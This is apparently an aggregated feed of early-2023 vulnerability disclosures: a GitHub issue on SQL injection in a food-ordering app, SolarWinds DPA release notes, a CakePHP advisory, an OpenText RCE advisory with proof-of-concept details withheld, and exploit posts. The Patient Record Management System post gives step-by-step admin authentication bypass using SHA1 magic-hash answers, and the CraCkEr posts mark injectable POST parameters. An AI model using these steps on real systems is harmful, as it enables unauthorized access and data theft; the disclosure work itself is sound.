Multiple SQL Injection vulnerabilies in tourist5 Online-food-ordering-system 1.0.

Hi,

You have lots of sql injection vulnerabilities. You can write your code with parametrized query for mitigation of sql injection.

Example-1:

https://github.com/tourist5/Online-food-ordering-system/blob/main/all-tickets.php

if(isset($\_GET\['status'\])){  
$status = $\_GET\['status'\];  
}  
else{  
$status = '%';  
}  
$sql = mysqli\_query($con, "SELECT \* FROM comments WHERE status LIKE '$status';");

You can exploit the parameter of $status.

Example-2:

https://github.com/tourist5/Online-food-ordering-system/blob/main/view-ticket.php

You can exploit $id parameter.

CVE-2020-29297: SQL Injection Vulnerabilities · Issue #1 · tourist5/Online-food-ordering-system

SQL Injection vulnerability in inxedu 2.0.6 allows attackers to execute arbitrary commands via the functionIds parameter to /saverolefunction.

CVE-2020-21152

In DPA 2022.4 and older releases, generated heap memory dumps contain sensitive information in cleartext.

Release date: January 18, 2023

These release notes describe the new features, improvements, and fixed issues in Database Performance Analyzer 2023.1. They also provide information about upgrades and describe workarounds for known issues.

**Learn more**

*   For information on the latest hotfixes, see DPA hotfixes.
*   For release notes for previous DPA versions, see Previous Version documentation.
*   For information about requirements, see DPA system requirements.
*   For information about working with DPA, see the DPA Administrator Guide.

**New features and improvements in DPA**

Return to top

DPA 2023.1 offers new features and improvements compared to previous releases of DPA.

**Improvements to importing alerts, rules, and custom properties**

DPA 2022.4 introduced the ability to export the alerts, rules, and custom properties that are configured on one DPA server and import them to another server. DPA 2023.1 improves the import functionality in the following ways:

*   You can specify which entities to import. The import wizard displays a list of the alerts, rules, and custom properties to be imported. Clear the checkbox next to any entity you don't want to import.
    
*   You can choose to overwrite existing entities with the same name. If you overwrite an entity, the existing entity is replaced by the imported entity.
    

**Additions to systems requirements and monitored instances**

 

Category

Vender and version

Repository database

Microsoft SQL Server 2022, Windows or Linux

Monitored database instances

Microsoft SQL Server 2022, Windows or Linux

VMware

VMware vCenter Server 7.0

VMware ESX/ESXi Host 7.0

For more information, see the DPA 2023.1 system requirements and Database instances DPA can monitor.

**Fixed issues in DPA 2023.1**

Return to top

DPA 2023.1 fixes the following issues.

 

Case number

Description

01144021, 01233510, 01234275

In deployments with an Oracle repository that monitor Oracle database instances, index analysis runs successfully. Logs no longer include the error message Unable to run index analysis.

01080326, 01129290, 01234534, 01236488

Files in the /tomcat/logs/ directory, such as catalina.out, stderr.log, and catalina._YYYY-MM-DD_.log, no longer grow quickly and consume a large amount of space.

00978208, 01076887

Collecting a large number of metrics (for example, because you have configured many custom metrics), can sometimes cause DPA monitoring to stop periodically. DPA 2023.1 includes metrics setting in the system.properties files that can be adjusted to avoid this issue. For information on adjusting these properties, see Scale DPA for the number of databases being monitored and the number of custom metrics.

00560405, 00850966, 01061361, 01128672

In previous versions, when DPA was installed on Windows the installer ran a VBS script to create the Windows service. If an organization had a security policy that prevented VBS scripts from running, the service was not created and DPA would not start. To prevent this issue, DPA 2023.1 runs a Powershell script instead of a VBS script.

**SolarWinds CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2022-38110

Reflected Cross-Site Scripting Vulnerability

In DPA 2022.4 and older releases, certain URL vectors are susceptible to authenticated reflected cross-site scripting.

6.3 Medium

CVE-2022-38112

Sensitive Information Disclosure Vulnerability

In DPA 2022.4 and older releases, generated heap memory dumps contain sensitive information in cleartext.

6.3 Medium

**Notes - BugCrowd**

SolarWinds would like to additionally thank our Bugcrowd community for their continued help in testing our products and keeping them secure

**New customer installation**

Return to top

For information about installing DPA, see the DPA Installation and Upgrade Guide. You can download a free trial from the SolarWinds website.

**Before you upgrade!**

If you are upgrading from DPA 2022.3 and you configured that version for SAML authentication, be aware that 2022.4 and later versions include changes to the SAML configuration. After the upgrade, no one will be able to log in with SAML until you update the configuration.

*   **Before** you upgrade, make sure you have a local login available.
    
*   **After** the upgrade, log in as a local user and complete the steps under SAML configuration changes in the DPA 2022.3 release notes to update the SAML configuration.
    

**How to upgrade**

If you are upgrading from an earlier version, use the following resources to plan and implement your upgrade:

*   Use the DPA Installation and Upgrade Guide to help you plan and execute your upgrade.
*   When you are ready, download the upgrade package from the SolarWinds Customer Portal.

**Known issues**

Return to top

 

Importing an alert definition without the associated database assignment rule

**Issue**

In some situations, the log file shows the status of an imported alert definition as both Imported and Failed. This occurs when the alert definition uses a database assignment rule, but the rule was not imported and did not already exist on the server.

The two statuses indicate that the alert definition was imported but the attempt to associate the database assignment rule failed.

**Resolution or Workaround**

When you import an alert definition that uses a database assignment rule, either import the rule or ensure that it already exists on the server.

If you imported an alert definition and the associated rule is missing, you must edit the alert definition to specify the database instances. (You can specify instances by manually selecting them or by applying a rule.)

 

REST API does not work when you access DPA with SAML login credentials

**Issue**

If you access DPA with SAML login credentials and you generate a refresh token, the following message is displayed when you attempt to use that refresh token to access the REST API:

You are not authorized to perform this action. Contact your DPA administrator.

**Resolution or Workaround**

Access DPA with a local login when you generate the refresh token.

 

The database name is not updated for stored procedures

**Issue**

If a stored procedure name includes the name of a database and it is copied to a different database, the database name is not updated. When DPA shows information about the copied stored procedure, the hash is the same as the first and the information appears to be incorrect.

**Resolution or Workaround**

If you experience this issue, complete the following steps:

1.  Run the following command against the DPA repository database (replacing <HashValue> with the stored procedure's hash value):
    
    delete from ignite.CONST_<DBID> where H = '<HashValue>'
    
2.  Restart DPA.

 

Registering an Azure SQL database instance fails when the privileged user is an Azure AD user

**Issue**

When registering an Azure SQL database, if you let DPA create the monitoring user and select an Azure Active Directory (AD) user as the privileged user, registration fails on the last step with the message Connection test to database as monitoring user failed.

**Resolution or Workaround**

Select the option 'I'll create the contained user or login', and follow the instructions to create the monitoring user manually.

 

Adding a distributed AG to a server prevents DPA from monitoring non-distributed AGs on the server

**Issue**

If DPA is monitoring non-distributed SQL Server Availability Groups (AGs) on a server and you add a distributed AG to the server, DPA stops monitoring the non-distributed AGs.

**Resolution or Workaround**

Do not add a distributed AG to the server.

 

Microsoft reports incorrect metric values for SQL Server on Linux

**Issue**

When you monitor a **SQL Server 2017** database instance that runs on a Linux server:

*   The O/S CPU Utilization resource always shows usage at 100%.
*   The Instance CPU Utilization resource always shows usage at 100%.
*   The O/S Memory Utilization resource always shows usage at 0%.

When you monitor a **SQL Server 2019** database instance that runs on a Linux server:

*   The O/S CPU Utilization resource always shows usage at 100%.
*   In some cases, the Instance CPU Utilization resource always shows usage at 100%.

Microsoft reports these values.

**Resolution or Workaround**

Disregard the values that are incorrect on your version of SQL Server. You can also disable the collection of a metric that shows incorrect data.

 

DPA fails to reconnect after losing its connection to a SQL Server instance

**Issue**

When DPA loses its connection to a monitored SQL Server instance (for example, when the DPA server is rebooted), and Windows authentication is used, DPA is sometimes unable to reconnect to the instance. This can happen if DPA attempts to connect before SQL Server has been able to connect to Active Directory. DPA interprets the rejected connection attempt as possibly occuring because the credentials were incorrect. To avoid being locked out of the account, DPA does not keep trying to reconnect. Messages such as the following appear in the logs:

Monitor for database [databaseName] failed to start due to [username and/or password must be updated due to previous login failure; if the credentials have not changed for this database, stop the monitor, wait for the monitor to stop, then start the monitor.].

**Resolution or Workaround**

When the monitored instance is fully initialized, manually restart monitoring. On the DPA home page, click the Action drop-down menu for the instance and select Start Monitor.

**End of life**

Return to top

   

Version

EoL Announcement

EoE Effective Date

EoL Effective Date

DPA 2022.1

**January18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2022.1 or earlier should begin transitioning to the latest version of DPA.

**April18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version2022.1 or earlier will no longer actively be supported by SolarWinds.

**April18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2022.1 or earlier.

DPA 2021.3

**October 18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2021.3 or earlier should begin transitioning to the latest version of DPA.

**January 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2021.3 or earlier will no longer actively be supported by SolarWinds.

**January 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2021.3 or earlier.

DPA 2021.1

**October 18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2021.1 or earlier should begin transitioning to the latest version of DPA.

**January 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2021.1 or earlier will no longer actively be supported by SolarWinds.

**January 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2021.1 or earlier.

DPA 2020.2

**October 18, 2022** End-of-Life (EoL) announcement - Customers on DPA version 2020.2 or earlier should begin transitioning to the latest version of DPA.

**January 18, 2023** End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for DPA version 2020.2 or earlier will no longer actively be supported by SolarWinds.

**January 18, 2024** End-of-Life (EoL) - SolarWinds will no longer provide technical support for DPA version 2020.2 or earlier.

**Deprecation notices**

Return to top

This version of Database Performance Analyzer deprecates the following platforms and features.

Deprecated platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features. 

 

Type

Details

DPA server OS

Installing DPA on a server with a **Windows Server 2012 R2** operating system is still supported in 2022.4, but support will be removed in an upcoming release.

_The scripts are not supported under any SolarWinds support program or service. The scripts are provided AS IS without warranty of any kind. SolarWinds further disclaims all warranties including, without limitation, any implied warranties of merchantability or of fitness for a particular purpose. The risk arising out of the use or performance of the scripts and documentation stays with you. In no event shall SolarWinds or anyone else involved in the creation, production, or delivery of the scripts be liable for any damages whatsoever (including, without limitation, damages for loss of business profits, business interruption, loss of business information, or other pecuniary loss) arising out of the use of or inability to use the scripts or documentation_.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-38112: DPA 2023.1 Release Notes

### Impact

The `Cake\Database\Query::limit()` and `Cake\Database\Query::offset()` methods are vulnerable to SQL injection if passed un-sanitized user request data.

### Patches
This issue has been fixed in 4.2.12, 4.3.11, 4.4.10

### Workarounds

Using CakePHP's Pagination library will mitigate this issue, as will validating or casting parameters to these methods.

### References

https://bakery.cakephp.org/2023/01/06/cakephp_4211_4311_4410_released.html


**Package**

composer cakephp/cakephp (Composer)

**Affected versions**

\>= 4.2.0, < 4.2.12

\>= 4.3.0, < 4.3.11

\>= 4.4.0, < 4.4.10

**Patched versions**

4.2.12

4.3.11

4.4.10

**Description**

**Impact**

The Cake\Database\Query::limit() and Cake\Database\Query::offset() methods are vulnerable to SQL injection if passed un-sanitized user request data.

**Patches**

This issue has been fixed in 4.2.12, 4.3.11, 4.4.10

**Workarounds**

Using CakePHP's Pagination library will mitigate this issue, as will validating or casting parameters to these methods.

**References**

https://bakery.cakephp.org/2023/01/06/cakephp\_4211\_4311\_4410\_released.html

**References**

*   GHSA-6g8q-qfpv-57wp
*   https://nvd.nist.gov/vuln/detail/CVE-2023-22727
*   cakephp/cakephp@3f463e7
*   https://bakery.cakephp.org/2023/01/06/cakephp\_4211\_4311\_4410\_released.html

 markstory published the maintainer security advisory

Jan 17, 2023

GHSA-6g8q-qfpv-57wp: CakePHP vulnerable to SQL injection

SQL-Injection vulnerability caused by the lack of verification of input values for the table name of DB used by the Mangboard bulletin board. A remote attacker can use this vulnerability to execute arbitrary code on the server where the bulletin board is running.

**KISA 인터넷 보호나라&KrCERT**

\[나주본원\] (58324) 전라남도 나주시 진흥길 9 한국인터넷진흥원 대표번호 : 1433-25(수신자 요금 부담)

\[서울청사\] (05717) 서울시 송파구 중대로 135 (가락동) IT벤처타워 \[해킹ㆍ스팸개인정보침해 신고 118\]

Copyright(C) 2021 KISA. All rights reserved.

CVE-2021-26644: KISA 인터넷 보호나라&KrCERT

Patient Record Management System version 1.0 suffers from an authentication bypass vulnerability during account recovery.

    # Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison# Exploit Author: Joe Pollock# Date: January 19, 2023# Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip# Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5# CVE: T.B.C# Vendor: kimcey500# Version: 1.0# Exploit Description:#   Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of #   the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator. #   If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication #   bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below:public function get_forgot_secret($login_id, $secans){   $this->db->where('u_id', $login_id);   $query = $this->db->get('users');   $decrypt = $query->row()->u_secretanswer;   if(sha1($secans) == $decrypt){ // md5 encryption       return $query->row();   }} ========================================================(+) To reproduce this exploit:========================================================1. Log in as the administrator and navigate to the password recovery functionality (http://localhost/Indexcontrol/secretquestion).2. Enter the ‘Current Password’ then select any ‘Secret Question’. 3. For the ‘Secret Answer’, use the following: 109324351124. Confirm the ‘Secret Answer’ then click ‘Submit’. Now logout of the administrator account.5. From the admin login page, click ‘Forgot Password?’.6. Enter ‘admin’ as the username then click ‘Submit’.7. For the ‘Secret Answer’, use any of the following:aaroZmOkw9KASOk6IkapaaO8zKZFaa3OFF9mw9KASOk6Ikap8. After clicking 'Submit, the 'create new password' functionality should be displayed and therefore authentication can be bypassed.========================================================(+) Explanation:========================================================Following from above, assume the administrator has chosen the following as their secret answer: 10932435112The application then stores the SHA1 hash of the secret answer in the database. The stored hash is: 0e07766915004133176347055865026311692244The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") only followed by numbers.In PHP, if two strings are loosely compared (==) and match the regular expression 0+e[0-9]+, the result will be TRUE.It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash. Any of the following secret answers could be used to bypass authentication:aaroZmOkw9KASOk6IkapaaO8zKZFaa3OFF9mw9KASOk6IkapSee here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.mdThe comparision which would take place by the application in get_forgot_secret() is:if(sha1(aaroZmOk) == "0e07766915004133176347055865026311692244"){   //Reset passwordWhich becomes:if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){   //Reset passwordDue to the loose comparision used (==), the above evaluates to TRUE, which would then allow the attacker to changethe password of the account.You can try this yourself using the interactive PHP interpreter:var_dump(sha1('aaroZmOk') == "0e111");var_dump(sha1('aaroZmOk') == "0e222");var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap'));========================================================(+) References and more information========================================================https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.mdhttp://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.htmlhttps://www.whitehatsec.com/blog/magic-hashes/https://github.com/spaze/hasheshttps://offsec.almond.consulting/super-magic-hash.html

Patient Record Management System 1.0 Authentication Bypass

OpenText Extended ECM versions 20.4 through 22.3 suffer from a pre-authentication remote code execution vulnerability in the Java frontend.

SEC Consult Vulnerability Lab Security Advisory < 20230117-1 >=======================================================================               title: Pre-authenticated Remote Code Execution via Java frontend                      and QDS endpoint             product: OpenText™ Content Server component of OpenText™ Extended ECM  vulnerable version: 20.4 - 22.3       fixed version: 22.4          CVE number: CVE-2022-45927              impact: Critical            homepage: https://www.opentext.com               found: 2022-09-16                  by: Armin Stock (Atos)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"OpenText™ Extended ECM is an enterprise CMS platform that securely governs theinformation lifecycle by integrating with leading enterprise applications, suchas SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing contentand processes together, Extended ECM provides access to information when andwhere it’s needed, improves decision-making and drives operational effectiveness."Source: https://www.opentext.com/products/extended-ecmBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.Vulnerability overview/description:-----------------------------------1) Pre-authenticated Remote Code Execution via Java frontend and QDS endpoint (CVE-2022-45927)The `QDS` endpoints of the `Content Server` are not protected by the normaluser management functionality of the `Content Server`, but check the value ofthe key `_REQUEST` of the incoming data. Normally this parameter is set by theHTTP frontend (e.g. the `CGI` binary `cs.exe` or `Java` application servlet) to`llweb`.There is a bug in the `Java` application server, found in`%OT_BASE%/application/cs.war`, which allows an attacker to actually set thevalue of the key `_REQUEST` to an arbitrary value and bypass the authorizationchecks.Most of the endpoints cannot be called, because they require specific data typesof the incoming data, which can not be controlled by the attacker. Only stringsare supported. But a few endpoints can be called which allow an attacker to createfiles or execute arbitrary code on the server.Proof of concept:-----------------1) Pre-authenticated Remote Code Execution via Java frontend and QDS endpoint (CVE-2022-45927)To be able to set the value of the `_REQUEST` parameter the attacker has tosend the data via a `POST` request with a `Content-Type` of `multipart/form-data`.This results in the following execution flow:-------------------------------------------------------------------------------[ Details removed, will be published at a later date ]-------------------------------------------------------------------------------The following request (using the `CGI` frontend) results in an unauthorizedresponse:-------------------------------------------------------------------------------[ PoC removed, will be published at a later date ]--------------------------------------------------------------------------------------------------------------------------------------------------------------<div class="cs-form-container cs-form-message-container">   <div>     <div class="cs-form-line-text cs-form-message cs-form-message-error" title="Error" id="errMsg" >       <p>         Content Server Error:       </p>       <p>         The request did not come from XXX.       </p>     </div>   </div></div>-------------------------------------------------------------------------------Whereas using the `Java` application server results in the following response:-------------------------------------------------------------------------------HTTP/1.1 200A<1,?,'ErrMsg'=?,'ErrMsgDetail'=?,'OK'=true,'QDSServerList'={}>Content-Type: text/html;charset=UTF-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self'X-UA-Compatible: IE=edgeContent-Length: 0Date: Tue, 27 Sep 2022 13:04:47 GMTConnection: close-------------------------------------------------------------------------------Create new objects:Using this bug it is possible to create objects in the `Content Server` withoutknown credentials and in the context of the super-admin user ( ID `1000` ), bycalling the endpoint `[ Details removed, will be published at a later date ]`.-------------------------------------------------------------------------------[ PoC removed, will be published at a later date ]-------------------------------------------------------------------------------The new object (subType = `145` text file) is created without providing cookiesand the `owner` attribute of this object is set to `1000` (super admin):-------------------------------------------------------------------------------HTTP/1.1 200A<1,?,'CATEGORY'=?,'CloneTime'=D/2022/9/28: 8:10:5,'COMMENT'='created','ContentType'=?,'CREATEDATE'=D/2022/9/28:8:10:5,'CREATEDBY'=1000,'DataID'=51982,'DATELASTMODIFY'=D/2022/9/28:8:10:5,'EXATT1'=?,'EXATT2'=?,'EXTENDEDDATA'=?,'GROUPPERM'=128,'location'=E648871951,'MAJOR'=?,'MAXVERSION'=-1,'MINOR'=?,'Name'='qds-create-poc.txt','nextURL'=E648871951,'Node'=A<1,?,'AssignedTo'=?,'CacheExpiration'=0,'Catalog'=0,'ChildCount'=0,'CreateDate'=D/2022/9/28:8:10:5,'CreatedBy'=1000,'DataID'=51982,'DataType'=?,'DateAssigned'=?,'DateCompleted'=?,'DateDue'=?,'DateEffective'=?,'DateExpiration'=?,'DateStarted'=?,'DCategory'=?,'DComment'='created','Deleted'=0,'ExAtt1'=?,'ExAtt2'=?,'ExtendedData'=?,'ExternalCreateDate'=?,'ExternalCreatorID'=?,'ExternalModifyDate'=?,'ExternalSourceID'=?,'GIF'=?,'GPermissions'=128,'GroupID'=999,'GUID'='@[537A1229-E0F5-45EE-A3F2-D7F91EE6CBBC]','Major'=?,'MaxVers'=-1,'Minor'=?,'ModifiedBy'=1000,'ModifyDate'=D/2022/9/28:8:10:5,'Multilingual'=V{<'LanguageCode','Name','DComment'><'de','qds-create-poc.txt','created'>},'Name'='qds-create-poc.txt','Ordering'=?,'OriginDataID'=0,'OriginOwnerID'=0,'OwnerID'=-2004,'ParentID'=2004,'PermID'=?,'Priority'=?,'ReleaseRef'=?,'Reserved'=0,'ReservedBy'=0,'ReservedDate'=?,'SPermissions'=16777215,'Status'=?,'SubType'=144,'UPermissions'=16777215,'UserID'=1000,'VersionNum'=1,'WPermissions'=128>,'OK'=true,'ORDERING'=?,'ORIGINALID'=0,'ORIGINALVOLID'=0,'PARENTID'=2004,'PERMISSIONS'=-2130706433,'PermsOK'=true,'Public'=false,'RELEASEREF'=?,'RESERVED'=0,'RESERVEDBY'=0,'RESERVEDDATE'=?,'SUBTYPE'=144,'SYSTEMPERM'=16777215,'USERID'=1000,'USERPERM'=16777215,'VERSION'=A<1,?,'DataSize'=6,'DocID'=51982,'ExternalCreateDate'=?,'ExternalCreatorID'=?,'ExternalModifyDate'=?,'ExternalSourceID'=?,'FileCDate'=D/2022/9/28:8:10:5,'FileCreator'=?,'FileMDate'=D/2022/9/28:8:10:5,'FileName'='qds-create-poc.txt','FileType'='html','GUID'='@[DF09D9F7-6A86-40CB-AECD-57FD5FB7D38B]','Indexed'=0,'Locked'=0,'LockedBy'=?,'LockedDate'=?,'MimeType'='text/html','Owner'=1000,'PageNum'=?,'Platform'=0,'ProviderId'=51982,'ProviderName'='SQL','ResSize'=0,'VerCDate'=D/2022/9/28:8:10:5,'VerComment'=?,'VerMajor'=0,'VerMDate'=D/2022/9/28:8:10:5,'VerMinor'=1,'Version'=1,'VersionID'=51982,'VersionName'='1','VerType'=?>,'versionInfo'=A<1,?,'COMMENT'=?,'CREATEDATE'=D/2022/9/28:8:10:5,'FILECREATEDATE'=D/2022/9/28:8:10:5,'FILECREATOR'=?,'FILEDATASIZE'=6,'FILEMODIFYDATE'=D/2022/9/28:8:10:5,'FILENAME'='qds-create-poc.txt','FILEPLATFORM'=0,'FILERESSIZE'=0,'FILETYPE'='html','ID'=51982,'INDEXED'=0,'LOCKED'=0,'LOCKEDBY'=?,'LOCKEDDATE'=?,'MIMETYPE'='text/html','MODIFYDATE'=D/2022/9/28:8:10:5,'NAME'='1','NODEID'=51982,'NUMBER'=1,'OWNER'=1000,'PROVIDERID'=51982,'PROVIDERNAME'='SQL','TYPE'=?>,'VOLUMEID'=-2004,'WORLDPERM'=128>Content-Type: text/html;charset=UTF-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self'X-UA-Compatible: IE=edgeContent-Length: 0Date: Wed, 28 Sep 2022 08:10:05 GMTConnection: close-------------------------------------------------------------------------------There is a process object (`typeId` = 271), which can be created and executedafterwards allowing attackers to execute arbitrary code.Vulnerable / tested versions:-----------------------------The following version has been tested:* 22.1 (16.2.19.1803)The following versions are vulnerable according to the vendor:* 20.4 - 22.3Vendor contact timeline:------------------------2022-10-07: Vendor contacted via security@opentext.com2022-10-07: Vendor acknowledged the email and is reviewing the reports2022-11-18: Vendor confirms all vulnerabilities and is working on a patch aimed to             be released in November2022-11-24: Vendor delays the patch "few days/weeks into December"2022-11-25: Requesting CVE numbers (Mitre)2022-12-15: Vendor delays the patch and provides a release date: January 16th 20232023-01-17: Public release of security advisorySolution:---------Upgrade to at least version 22.4 or apply hotfixes which can be downloaded atthe vendor's page:https://support.opentext.com/csm?id=kb_article_view&sysparm_article=KB0781429Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Armin Stock / @2023

OpenText Extended ECM 22.3 Java Frontend Remote Code Execution

Inout Multi-Vendor Shopping Cart version 3.2.3 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Multi-Vendor Shopping Cart 3.2.3                                     │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company's reputation.                                                      │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php

POST parameter 'val' is vulnerable to SQLI

val=All[INJECT-HERE]&category=9%20&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'category' is vulnerable to SQLI

val=All&category=9%20[INJECT-HERE]&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'startpage' is vulnerable to SQLI

val=All&category=9 &startpage=0[INJECT-HERE]&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'real_price_min' is vulnerable to SQLI

val=All&category=9 &startpage=0&real_price_min=250[INJECT-HERE]&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'real_price_max' is vulnerable to SQLI

val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222[INJECT-HERE]vendorid=0&size=&color=

POST parameter 'vendorid' is vulnerable to SQLI

val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222&vendorid=0[INJECT-HERE]&size=&color=

[-] Done

Inout Multi-Vendor Shopping Cart 3.2.3 SQL Injection

Inout Multi-Vendor Shopping Cart version 3.2.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Multi-Vendor Shopping Cart 3.2.3                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, 